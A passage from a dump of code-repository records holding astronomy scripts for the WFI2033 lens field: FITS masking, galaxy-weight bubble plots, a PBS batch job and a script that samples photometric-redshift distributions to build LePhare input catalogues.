np.c_[data[0],data[1],data[2],data[3],data[4],data_bpz]\nnp.savetxt(fileout,dataout,header=str,fmt='%d \\t %.7f \\t %.7f \\t %.7f \\t %.2f %.2f')\n\nos.system(\"rm %s\" % (file1[:-4]+\".bpz\"))\nos.system(\"rm %s\" % (file1[:-4]+\".bpz.bak\"))\n#os.system(\"rm %s\" % (file1[:-4]+\"_bpz.cat\"))\nos.system(\"rm %s\" % (file1[:-4]+\".flux_comparison\"))\nos.system(\"rm %s\" % (file1[:-4]+\".probs\"))\nos.system(\"rm %s\" % file1)\nif \"gri\" in file: os.system(\"rm %s\" % (file1[:-4]+'.columns'))\n\nprint(\"Total time for field: --- %s seconds ---\" % (time.time() - start_timefield))\n\nprint 'Done!'\n" }, { "alpha_fraction": 0.691428542137146, "alphanum_fraction": 0.7628571391105652, "avg_line_length": 30.727272033691406, "blob_id": "e047e72636413ef4f6e371613d14a74fc0c56582", "content_id": "ff87a670fb2d30a676d51698b6d02d4715e1c86e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 350, "license_type": "no_license", "max_line_length": 62, "num_lines": 11, "path": "/python/image_utilities/mask.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Simple script to change pixel values in custom regions\n\nimport numpy as np\nfrom astropy.io import fits\n\nimage = fits.open('gaussswarpWFI2033_F814W_sci.fits')\nweight = fits.open('gaussswarpWFI2033_F814W_sci_wht.fits')\ndatai = image[0].data\ndataw = weight[0].data\ndatai[dataw == 0] = 0\nimage.writeto('gaussswarpWFI2033_F814W_sci.fits',clobber=True)\n\n" }, { "alpha_fraction": 0.5065656304359436, "alphanum_fraction": 0.6087542176246643, "avg_line_length": 36.59493637084961, "blob_id": "69875ad7f22fca7ae85771cf29207907dbb8d805", "content_id": "7ba616c4d57feb3e48f67b5dc992335558b56030", 
"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5940, "license_type": "no_license", "max_line_length": 294, "num_lines": 158, "path": "/python/plot_utilities/bubbles_WFI2033.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Creates figure 4 from Rusu et al. 2017\n\nimport numpy as np\nimport sys\nimport os\nfrom os import system\nimport time\nimport matplotlib.pyplot as plt\nfrom matplotlib.collections import EllipseCollection\n\nplt.clf()\n\ndef plot(ind,px,py,str,mult):\n ax=plt.subplot(4,4,ind, sharex=ax1, sharey=ax1)\n plt.axis([-130, 130, -130, 130])\n #plt.gca().set_aspect('equal', adjustable='box')\n plt.tick_params(axis='both', which='major', labelsize=6)\n if (ind == 10) | (ind == 11) | (ind == 12) | (ind == 13) | (ind == 14):\n plt.xticks(rotation='vertical')\n ax.text(px, py, str, fontsize=fontlabel, color='k',transform=ax.transAxes)\n xx = data[:,ind+2][data[:,2]>maglim2].astype(float)*mult # multiplier to make the bubbles have an appropriate radius\n xx[xx<2]=2 # minimum visible bubble size\n yy = data[:,ind+2][data[:,2]<=maglim2].astype(float)*mult\n yy[yy<2]=2\n plt.scatter((-pix/2 + data[:,0][data[:,2]>maglim2])*scale, (-pix/2 + data[:,1][data[:,2]>maglim2])*scale, s=xx.astype(int), c='black', lw = 0, alpha=0.5) # typically red\n plt.scatter((-pix/2 + data[:,0][data[:,2]<=maglim2])*scale, (-pix/2 + data[:,1][data[:,2]<=maglim2])*scale, s=yy.astype(int), c='black', lw = 0, alpha=0.5) # typically blue\n\nfontabsciss = 9\nfontlabel = 7\nnRows = 4\nnCols = 4\nnPlots = 14\n\nz_s = 1.66\npix = 915 # number of pixels in 4 arcmin\nscale = 240.0 / pix\nmaglim1 = 23 # for plots when I want blue and red points I would use 24\nmaglim2 = 23\n\nx,y,i,classify,z,mstar,mhalo = np.loadtxt(\"/Users/eduardrusu/Dropbox/Davis_work/code/WFI2033/i_detect_i_and_ir_rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephareclassifiedF160W_WFI2033IRACbpz_nobeta.cat\",usecols=[0,1,4,7,8,9,10],unpack=True)\nsep = np.sqrt((x - 457.5)**2 + (y - 457.5)**2) * scale\n\nx = x[(sep <= 120) & (i <= maglim1) & (classify >= 0)]\ny = y[(sep <= 120) & (i <= maglim1) & (classify >= 0)]\nz = z[(sep <= 120) & (i <= maglim1) & (classify >= 0)]\ni_ = i[(sep <= 120) & (i <= maglim1) & (classify >= 0)]\nsep_ = sep[(sep <= 120) & (i <= maglim1) & (classify >= 0)]\nmstar = mstar[(sep <= 120) & (i <= maglim1) & (classify >= 0)]\nmhalo = mhalo[(sep <= 120) & (i <= maglim1) & (classify >= 0)]\nsep = sep_\ni = i_\n\nwht_1 = np.ones(len(x))\nwht_z = z_s * z - z * z\nwht_M = 10 ** mstar\nwht_M2 = (10 ** mstar) ** 2\nwht_M3 = (10 ** mstar) ** 3\nwht_1r = 1/sep\nwht_zr = wht_z * wht_1r\nwht_Mr = wht_M * wht_1r\nwht_M2r = wht_M2 * wht_1r\nwht_M3r = wht_M3 * wht_1r\nwht_flexion = wht_M * (wht_1r ** 3)\nwht_tidal = wht_M * (wht_1r ** 2)\nwht_SIS = np.sqrt(wht_M) * wht_1r\nwht_SIShalo = np.sqrt(10 ** mhalo) * wht_1r\ndata = np.c_[x,y,i,wht_1,wht_z,wht_M,wht_M2,wht_M3,wht_1r,wht_zr,wht_Mr,wht_M2r,wht_M3r,wht_flexion,wht_tidal,wht_SIS,wht_SIShalo]\n\n# 0 x\n# 1 y\n# 2 i\n# 3 wht_1\n# 4 wht_z\n# 5 wht_M\n# 6 wht_M2\n# 7 wht_M3\n# 8 wht_1r\n# 9 wht_zr\n# 10 wht_Mr\n# 11 wht_M2r\n# 12 wht_M3r\n# 13 wht_flexion\n# 14 wht_tidal\n# 15 wht_SIS\n# 16 wht_SIShalo\n\nplt.clf()\n\nplt.axis([-130, 130, -130, 130])\n\nfig = plt.figure()\nax1 = fig.add_subplot(4,4,1)\nax = plt.subplot(4,4,1, sharex=ax1, sharey=ax1)\nax.set_aspect(1, adjustable='datalim')\n\nfor i in range(14):\n \n if i == 0: 
plot(i+1,0.9,0.85,\"$1$\",5)\n    if i == 1: plot(i+1,0.9,0.85,\"$z$\",10)\n    if i == 2: plot(i+1,0.9,0.85,\"$M_\\star$\",1.0/1000000000)\n    if i == 3: plot(i+1,0.85,0.85,\"$M^2_\\star$\",1.0/100000000000000000000)\n    if i == 4: plot(i+1,0.85,0.85,\"$M^3_\\star$\",1.0/20000000000000000000000000000000)\n    if i == 5: plot(i+1,0.8,0.85,\"$1/r$\",200)\n    if i == 6: plot(i+1,0.8,0.85,\"$z/r$\",400)\n    if i == 7: plot(i+1,0.8,0.85,\"$M_\\star/r$\",1.0/100000000)\n    if i == 8: plot(i+1,0.8,0.85,\"$M^2_\\star/r$\",1.0/10000000000000000000)\n    if i == 9: plot(i+1,0.8,0.85,\"$M^3_\\star/r$\",1.0/1000000000000000000000000000000)\n    if i == 10: plot(i+1,0.8,0.85,\"$M_\\star/r^3$\",1.0/2000000)\n    if i == 11: plot(i+1,0.8,0.85,\"$M_\\star/r^2$\",1.0/10000000)\n    if i == 12: plot(i+1,0.75,0.85,\"$\\sqrt{M_\\star}/r$\",1.0/500)\n    if i == 13: plot(i+1,0.7,0.85,\"$\\sqrt{M_h}/r$\",1.0/10000)\n\n    circle120=plt.Circle((0,0),120,color='k',fill=False)\n    circle45=plt.Circle((0,0),45,color='k',fill=False)\n    fig = plt.gcf()\n    fig.gca().add_artist(circle120)\n    fig.gca().add_artist(circle45)\n\n# hide the plots with no data in the grid\nax=plt.subplot(4,4,15, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='x',which='both',bottom='off',top='off',labelbottom='off')\nplt.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')\nax.set_frame_on(False)\nax=plt.subplot(4,4,16, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='x',which='both',bottom='off',top='off',labelbottom='off')\nplt.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')\nax.set_frame_on(False)\n\nindex = 1\nfor r in range(1, nRows +1):\n    for c in range(1, nCols + 1):\n        ax = plt.subplot(nRows, nCols, index, sharex=ax1, sharey=ax1)\n        index += 1\n        # Turn off y tick labels for all but the first column.\n        if ((c != 1) and (index <= nPlots)):\n            plt.setp(ax.get_yticklabels(), visible=False)\n        #if c == 1:\n            #plt.ylabel('arcsec',fontsize=fontabsciss)\n        # Turn off x tick labels for all but the bottom plot in each \n        # column. 
\n            if ((nPlots - index) >= nCols):\n                plt.setp(ax.get_xticklabels(), visible=False)\n        #plt.set_aspect('equal')\n        #if (index == 15) or (index == 16) or (index == 17) or (index == 18):\n            #plt.xlabel('arcsec',fontsize=fontabsciss)\n        if index == 15:\n            plt.setp(ax.get_yticklabels(), visible=False)\n\nfig.text(0.5, 0.04, 'radius [arcsec]', ha='center', va='center')\nfig.text(0.06, 0.5, 'radius [arcsec]', ha='center', va='center', rotation='vertical')\nplt.subplots_adjust(wspace=0, hspace=0)\n\n#plt.subplots_adjust(left=None, bottom=0.1, right=None, top=0.95, wspace=0.4, hspace=0.6)\n\nplt.savefig('bubbles.png', dpi=500, bbox_inches='tight')\n\n\nprint 'Done!'\n" }, { "alpha_fraction": 0.6557376980781555, "alphanum_fraction": 0.7587822079658508, "avg_line_length": 23.72222137451172, "blob_id": "58fb6fc457c4a8094e8ed59c5a36637fb1a5d49f", "content_id": "b56b15f09532099aea86f43b22b3df4166b9fcaa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 427, "license_type": "no_license", "max_line_length": 92, "num_lines": 18, "path": "/python/scripts/NAOJ/batch_infer23.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log23.out\n#PBS -e Log23.err\n#PBS -N 23\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappa_unbiasedwithshearincrement2228.py WFI2033 5 45 23 meds gal oneoverr mass3\npython inferkappa_unbiasedwithshearincrement2228.py WFI2033 5 120 23 meds gal oneoverr mass3\n" }, { "alpha_fraction": 0.5164433121681213, "alphanum_fraction": 0.5932573676109314, "avg_line_length": 50.01506042480469, "blob_id": "38b60ee9bc5cb014b57a7c8f9ac648f896241324", "content_id": "1657cac412935a564f41ec0bcf9ce79bcefdab95", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16937, "license_type": "no_license", "max_line_length": 682, "num_lines": 332, "path": "/python/catalogue_utilities/photozsampling.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Run this code in order to sample from P(z) for the lens catalogue, with or without spectroscopic information. Requires that a necessary .probs file exists in the BPZ folder, containing P(z) computed with BPZ on a grid z=arange(0.0000,3.5100,0.0100). Also requires that the .pz files exist for each object with z=arange(0.0100,4.0000,0.0100) from a previous EAzY run on a grid z=arange(0.0100,4.00,0.0100). 
The code then uses a modified version of converttolephare_WFI2033.py and converttolephare_noobs_WFI2033.py in order to produce the input expected by Lephare.\n\nimport numpy as np\nimport scipy\nfrom scipy import stats\nimport sys\nimport os\nfrom os import system\nimport time\n\nuseeazy = 1\nsamples = 20\n#file = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephareclassifiedF160W.cat\"\n#filebpz = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_forbpz.probs\"\n#if useeazy == 1: fileeazy = \"/Users/cerusu/GITHUB/eazy-photoz/inputs/OUTPUT/sample_ir/\"\nfile = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/i_detect_i_and_ir_rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephareclassifiedF160W.cat\"\nfilebpz = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/i_detect_i_and_ir_rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_forbpz.probs\"\nif useeazy == 1: fileeazy = \"/Users/cerusu/GITHUB/eazy-photoz/inputs/OUTPUT/sample_i/\"\n\n# zeropoint corrections suggested by lephare:\nu_corr = +1.40\ng_corr = -0.03\nr_corr = -0.00\ni_corr = 0.00\nz_corr = -0.01\nY_corr = -0.07\nJ_corr = -0.10\nH_corr = -0.01\nKs_corr = +0.06\n\n# conversion from Vega to AB; assuming that the input mags are in Vega\nJ_corr += 0.94 # computed by LePhare\nH_corr += 1.35\nKs_corr += 1.83\n\n# use the modified version of converttolephare_noobs_WFI2033.py:\ndef lephare_noobs(data,fileout,irac):\n\n    # a small number of objects in BPZ have good mags, but error on the mag 99; those objects should be good, and ideally I would fix the errors one by one through closer examination. Here I just replace their errors with 1 mag\n    data[u_err][np.abs(data[u_err]) == 99.00] = 1.00\n    data[g_err][np.abs(data[g_err]) == 99.00] = 1.00\n    data[r_err][np.abs(data[r_err]) == 99.00] = 1.00\n    data[i_err][np.abs(data[i_err]) == 99.00] = 1.00\n    data[z_err][np.abs(data[z_err]) == 99.00] = 1.00\n    data[Y_err][np.abs(data[Y_err]) == 99.00] = 1.00\n    data[J_err][np.abs(data[J_err]) == 99.00] = 1.00\n    data[H_err][np.abs(data[H_err]) == 99.00] = 1.00\n    data[Ks_err][np.abs(data[Ks_err]) == 99.00] = 1.00\n\n    if irac == False:\n        # If not observed in a specific band, negative values (-99,-99) can be used for (mag,error)\n        data[irac1] = -99\n        data[irac1_err] = -99\n        data[irac2] = -99\n        data[irac2_err] = -99\n        data[irac3] = -99\n        data[irac3_err] = -99\n        data[irac4] = -99\n        data[irac4_err] = -99\n\n    data[u_err][np.abs(data[u]) == 99.0] = -99.0\n    data[g_err][np.abs(data[g]) == 99.0] = -99.0\n    data[r_err][np.abs(data[r]) == 99.0] = -99.0\n    data[i_err][np.abs(data[i]) == 99.0] = -99.0\n    data[z_err][np.abs(data[z]) == 99.0] = -99.0\n    data[Y_err][np.abs(data[Y]) == 99.0] = -99.0\n    data[J_err][np.abs(data[J]) == 99.0] = -99.0\n    data[H_err][np.abs(data[H]) == 99.0] = -99.0\n    data[Ks_err][np.abs(data[Ks]) == 99.0] = -99.0\n    data[u][np.abs(data[u]) == 99.0] = -99.0\n    data[g][np.abs(data[g]) == 99.0] = -99.0\n    data[r][np.abs(data[r]) == 99.0] = -99.0\n    data[i][np.abs(data[i]) == 99.0] = -99.0\n    data[z][np.abs(data[z]) == 99.0] = -99.0\n    data[Y][np.abs(data[Y]) == 99.0] = -99.0\n    data[J][np.abs(data[J]) == 99.0] = -99.0\n    data[H][np.abs(data[H]) == 99.0] = -99.0\n    data[Ks][np.abs(data[Ks]) == 99.0] = -99.0\n\n    # apply the corrections\n    data[u][np.abs(data[u]) != 99.0] += u_corr\n    data[g][np.abs(data[g]) != 99.0] += g_corr\n    data[r][np.abs(data[r]) != 99.0] += 
r_corr\n    data[i][np.abs(data[i]) != 99.0] += i_corr\n    data[z][np.abs(data[z]) != 99.0] += z_corr\n    data[Y][np.abs(data[Y]) != 99.0] += Y_corr\n    data[J][np.abs(data[J]) != 99.0] += J_corr\n    data[H][np.abs(data[H]) != 99.0] += H_corr\n    data[Ks][np.abs(data[Ks]) != 99.0] += Ks_corr\n\n    # LePhare thinks error bars = 0 means non-detection, so fix this\n    data[u_err][data[u_err] == 0.00] = 0.01\n    data[g_err][data[g_err] == 0.00] = 0.01\n    data[r_err][data[r_err] == 0.00] = 0.01\n    data[i_err][data[i_err] == 0.00] = 0.01\n    data[z_err][data[z_err] == 0.00] = 0.01\n    data[Y_err][data[Y_err] == 0.00] = 0.01\n    data[J_err][data[J_err] == 0.00] = 0.01\n    data[H_err][data[H_err] == 0.00] = 0.01\n    data[Ks_err][data[Ks_err] == 0.00] = 0.01\n\n    str = \"ID \\t u \\t u_err \\t g \\t g_err \\t r \\t r_err \\t i \\t i_err \\t z \\t z_err \\t Y \\t Y_err \\t J \\t J_err \\t H \\t H_err \\t K \\t Ks_err \\t ch1 \\t ch1_err \\t ch2 \\t ch2_err \\t ch3 \\t ch3_err \\t ch4 \\t ch4_err \\t context z-spec \\t string\"\n    dataout = np.c_[data[id],data[u],data[u_err],data[g],data[g_err],data[r],data[r_err],data[i],data[i_err],data[z],data[z_err],data[Y],data[Y_err],data[J],data[J_err],data[H],data[H_err],data[Ks],data[Ks_err],data[irac1],data[irac1_err],data[irac2],data[irac2_err],data[irac3],data[irac3_err],data[irac4],data[irac4_err],data[redshift]]\n    np.savetxt(fileout,dataout,header=str,fmt='%d \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t 8191 \\t %.4f ')\n\n# use the modified version of converttolephare_WFI2033.py:\ndef lephare(data,fileout,irac):\n    if irac == False:\n        # If not observed in a specific band, negative values (-99,-99) can be used for (mag,error)\n        data[irac1] = -99\n        data[irac1_err] = -99\n        data[irac2] = -99\n        data[irac2_err] = -99\n        data[irac3] = -99\n        data[irac3_err] = -99\n        data[irac4] = -99\n        data[irac4_err] = -99\n\n    # a small number of objects in BPZ have good mags, but error on the mag 99; those objects should be good, and ideally I would fix the errors one by one through closer examination. 
Here I just replace their errors with 1 mag\n data[u_err][np.abs(data[u_err]) == 99.00] = 1.00\n data[g_err][np.abs(data[g_err]) == 99.00] = 1.00\n data[r_err][np.abs(data[r_err]) == 99.00] = 1.00\n data[i_err][np.abs(data[i_err]) == 99.00] = 1.00\n data[z_err][np.abs(data[z_err]) == 99.00] = 1.00\n data[Y_err][np.abs(data[Y_err]) == 99.00] = 1.00\n data[J_err][np.abs(data[J_err]) == 99.00] = 1.00\n data[H_err][np.abs(data[H_err]) == 99.00] = 1.00\n data[Ks_err][np.abs(data[Ks_err]) == 99.00] = 1.00\n\n # apply the corrections\n data[u][np.abs(data[u]) != 99.0] += u_corr\n data[g][np.abs(data[g]) != 99.0] += g_corr\n data[r][np.abs(data[r]) != 99.0] += r_corr\n data[i][np.abs(data[i]) != 99.0] += i_corr\n data[z][np.abs(data[z]) != 99.0] += z_corr\n data[Y][np.abs(data[Y]) != 99.0] += Y_corr\n data[J][np.abs(data[J]) != 99.0] += J_corr\n data[H][np.abs(data[H]) != 99.0] += H_corr\n data[Ks][np.abs(data[Ks]) != 99.0] += Ks_corr\n\n # correct the limiting mags\n data[u_err][np.abs(data[u]) == 99.0] += u_corr\n data[g_err][np.abs(data[g]) == 99.0] += g_corr\n data[r_err][np.abs(data[r]) == 99.0] += r_corr\n data[i_err][np.abs(data[i]) == 99.0] += i_corr\n data[z_err][np.abs(data[z]) == 99.0] += z_corr\n data[Y_err][np.abs(data[Y]) == 99.0] += Y_corr\n data[J_err][np.abs(data[J]) == 99.0] += J_corr\n data[H_err][np.abs(data[H]) == 99.0] += H_corr\n data[Ks_err][np.abs(data[Ks]) == 99.0] += Ks_corr\n\n # the format for nondetections is error=-1.0 and magnitude at 1-sigma\n data[u][np.abs(data[u]) == 99.0] = data[u_err][np.abs(data[u]) == 99.0]\n data[g][np.abs(data[g]) == 99.0] = data[g_err][np.abs(data[g]) == 99.0]\n data[r][np.abs(data[r]) == 99.0] = data[r_err][np.abs(data[r]) == 99.0]\n data[i][np.abs(data[i]) == 99.0] = data[i_err][np.abs(data[i]) == 99.0]\n data[z][np.abs(data[z]) == 99.0] = data[z_err][np.abs(data[z]) == 99.0]\n data[Y][np.abs(data[Y]) == 99.0] = data[Y_err][np.abs(data[Y]) == 99.0]\n data[J][np.abs(data[J]) == 99.0] = data[J_err][np.abs(data[J]) == 99.0]\n data[H][np.abs(data[H]) == 99.0] = data[H_err][np.abs(data[H]) == 99.0]\n data[Ks][np.abs(data[Ks]) == 99.0] = data[Ks_err][np.abs(data[Ks]) == 99.0]\n data[u_err][np.abs(data[u_err]) > 20] = -1.0\n data[g_err][np.abs(data[g_err]) > 20] = -1.0\n data[r_err][np.abs(data[r_err]) > 20] = -1.0\n data[i_err][np.abs(data[i_err]) > 20] = -1.0\n data[z_err][np.abs(data[z_err]) > 20] = -1.0\n data[Y_err][np.abs(data[Y_err]) > 20] = -1.0\n data[J_err][np.abs(data[J_err]) > 20] = -1.0\n data[H_err][np.abs(data[H_err]) > 20] = -1.0\n data[Ks_err][np.abs(data[Ks_err]) > 20] = -1.0\n\n # LePhare thinks error bars = 0 means non-detection, so fix this\n data[u_err][data[u_err] == 0.00] = 0.01\n data[g_err][data[g_err] == 0.00] = 0.01\n data[r_err][data[r_err] == 0.00] = 0.01\n data[i_err][data[i_err] == 0.00] = 0.01\n data[z_err][data[z_err] == 0.00] = 0.01\n data[Y_err][data[Y_err] == 0.00] = 0.01\n data[J_err][data[J_err] == 0.00] = 0.01\n data[H_err][data[H_err] == 0.00] = 0.01\n data[Ks_err][data[Ks_err] == 0.00] = 0.01\n\n str = \"ID \\t u \\t u_err \\t g \\t g_err \\t r \\t r_err \\t i \\t i_err \\t z \\t z_err \\t Y \\t Y_err \\t J \\t J_err \\t H \\t H_err \\t K \\t Ks_err \\t ch1 \\t ch1_err \\t ch2 \\t ch2_err \\t ch3 \\t ch3_err \\t ch4 \\t ch4_err \\t context z-spec \\t string\"\n dataout = 
np.c_[data[id],data[u],data[u_err],data[g],data[g_err],data[r],data[r_err],data[i],data[i_err],data[z],data[z_err],data[Y],data[Y_err],data[J],data[J_err],data[H],data[H_err],data[Ks],data[Ks_err],data[irac1],data[irac1_err],data[irac2],data[irac2_err],data[irac3],data[irac3_err],data[irac4],data[irac4_err],data[redshift]]\n    np.savetxt(fileout,dataout,header=str,fmt='%d \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t 8191 \\t %.4f ')\n\n\n###################\n# sampling from BPZ:\n\npdz = np.loadtxt(filebpz, unpack=False)\nsamplez = np.zeros((pdz.shape[0],samples)) # draw 'samples' redshift samples for each object\nzgridint = np.arange(350) # integers corresponding to z=arange(0.0000,3.5100,0.0100)\n\nid = 8\nspec = 40 # -1: no spec data; -2: spec star; >0: available spec\nu = 9\nu_err = 10\ng = 11\ng_err = 12\nr = 13\nr_err = 14\ni = 15\ni_err = 16\nz = 17\nz_err = 18\nY = 19\nY_err = 20\nJ = 21\nJ_err = 22\nH = 23\nH_err = 24\nKs = 25\nKs_err = 26\nirac_1 = 74\nirac_1_err = 75\nirac_2 = 76\nirac_2_err = 77\nirac_3 = 78\nirac_3_err = 79\nirac_4 = 80\nirac_4_err = 81\n\nphot = np.loadtxt(file, usecols = [id,spec,u,u_err,g,g_err,r,r_err,i,i_err,z,z_err,Y,Y_err,J,J_err,H,H_err,Ks,Ks_err,irac_1,irac_1_err,irac_2,irac_2_err,irac_3,irac_3_err,irac_4,irac_4_err], unpack = False)\n\n# now relabel the columns:\nid = 0\nspec = 1\nu = 2\nu_err = 3\ng = 4\ng_err = 5\nr = 6\nr_err = 7\ni = 8\ni_err = 9\nz = 10\nz_err = 11\nY = 12\nY_err = 13\nJ = 14\nJ_err = 15\nH = 16\nH_err = 17\nKs = 18\nKs_err = 19\nirac1 = 20\nirac1_err = 21\nirac2 = 22\nirac2_err = 23\nirac3 = 24\nirac3_err = 25\nirac4 = 26\nirac4_err = 27\nredshift = 28 # the redshift needed by lephare\n\nfor k in range(pdz.shape[0]): # for each galaxy\n    if np.sum(pdz[k][1:]) != 1: # not all BPZ probabilities are perfectly normalized\n        l = 1\n        while pdz[k][l] != 0: l += 1\n        pdz[k][l] = 1 - np.sum(pdz[k][1:]) # the first instance where the probability is zero, add the required offset to have a perfect normalization\n    custm = stats.rv_discrete(name='custm', values=(zgridint, pdz[k][1:])) # ignore the first column, which is the ID\n    sample = custm.rvs(size = samples)\n    if phot[k][spec] < 0: # if no spectrum is available or if the object is a spectroscopic star\n        samplez[k] = np.array([np.max([0.01 * sample[0],0.01]),np.max([0.01 * sample[1],0.01]),np.max([0.01 * sample[2],0.01]),np.max([0.01 * sample[3],0.01]),np.max([0.01 * sample[4],0.01]),np.max([0.01 * sample[5],0.01]),np.max([0.01 * sample[6],0.01]),np.max([0.01 * sample[7],0.01]),np.max([0.01 * sample[8],0.01]),np.max([0.01 * sample[9],0.01]),np.max([0.01 * sample[10],0.01]),np.max([0.01 * sample[11],0.01]),np.max([0.01 * sample[12],0.01]),np.max([0.01 * sample[13],0.01]),np.max([0.01 * sample[14],0.01]),np.max([0.01 * sample[15],0.01]),np.max([0.01 * sample[16],0.01]),np.max([0.01 * sample[17],0.01]),np.max([0.01 * sample[18],0.01]),np.max([0.01 * sample[19],0.01])])\n    # because 0.01 is the redshift step; the minimum redshift accepted by LePhare is 0.01\n    else:\n        samplez[k] = np.array([phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec]])\n    for j in range(phot.shape[0]): # 
match the two files by ID\n        if pdz[k][0] == phot[j][0]:\n            if k != 0:\n                lephdata = np.c_[lephdata,phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j]]\n            else:\n                lephdata = np.c_[phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j],phot[j]]\n\nsamplez = samplez.reshape(samplez.size)\n#print np.shape(lephdata)\nlephdata = np.r_[lephdata,samplez.reshape(1,samplez.size)]\n#print np.shape(lephdata)\n\ndata = np.copy(lephdata)\nlephare(data,file[:-4] + \"_bpzsample.cat\",True)\ndata = np.copy(lephdata)\nlephare(data,file[:-4] + \"_noIRACbpzsample.cat\",False)\ndata = np.copy(lephdata)\nlephare_noobs(data,file[:-4] + \"_bpzsample_noobs.cat\",True)\ndata = np.copy(lephdata)\nlephare_noobs(data,file[:-4] + \"_noIRACbpzsample_noobs.cat\",False)\n\n\n###################\n# sampling from EAzY:\nif useeazy == 1:\n    del lephdata\n    lst = [x for x in os.listdir('%s' %fileeazy) if ('.pz' in x)]\n    samplez = np.zeros((len(lst),samples)) # draw 'samples' redshift samples for each object\n\n    gal = np.zeros(len(lst)) # array of all the ID of galaxies\n    for k in range(len(lst)):\n        gal[k] = int(lst[k].strip('.pz'))\n    gal = gal.astype(int)\n\n    zgridint = np.arange(400)\n    nr = 0\n    for k in range(phot.shape[0]):\n        if int(phot[k][0]) in gal:\n            pdz = np.loadtxt('%s%s.pz' % (fileeazy,int(phot[k][0])), usecols = [3], unpack=True)\n            pdz = pdz/np.sum(pdz) # it needs to be normalized\n            custm = stats.rv_discrete(name='custm', values=(zgridint, pdz)) # sample from the normalized P(z)\n            sample = custm.rvs(size = samples)\n            if phot[k][spec] < 0: # if no spectrum is available or if the object is a spectroscopic star\n                samplez[nr] = np.array([0.01 + 0.01 * sample[0],0.01 + 0.01 * sample[1],0.01 + 0.01 * sample[2],0.01 + 0.01 * sample[3],0.01 + 0.01 * sample[4],0.01 + 0.01 * sample[5],0.01 + 0.01 * sample[6],0.01 + 0.01 * sample[7],0.01 + 0.01 * sample[8],0.01 + 0.01 * sample[9],0.01 + 0.01 * sample[10],0.01 + 0.01 * sample[11],0.01 + 0.01 * sample[12],0.01 + 0.01 * sample[13],0.01 + 0.01 * sample[14],0.01 + 0.01 * sample[15],0.01 + 0.01 * sample[16],0.01 + 0.01 * sample[17],0.01 + 0.01 * sample[18],0.01 + 0.01 * sample[19]]) # because 0.01 is the redshift step\n            else:\n                samplez[nr] = np.array([phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec],phot[k][spec]])\n            if nr != 0:\n                lephdata = np.c_[lephdata,phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k]]\n            else:\n                lephdata = np.c_[phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k],phot[k]]\n            nr = nr + 1\n\n    samplez = samplez.reshape(samplez.size)\n    print np.shape(lephdata)\n    lephdata = np.r_[lephdata,samplez.reshape(1,samplez.size)]\n\n    data = np.copy(lephdata)\n    lephare(data,file[:-4] + \"_eazysample.cat\",True)\n    data = np.copy(lephdata)\n    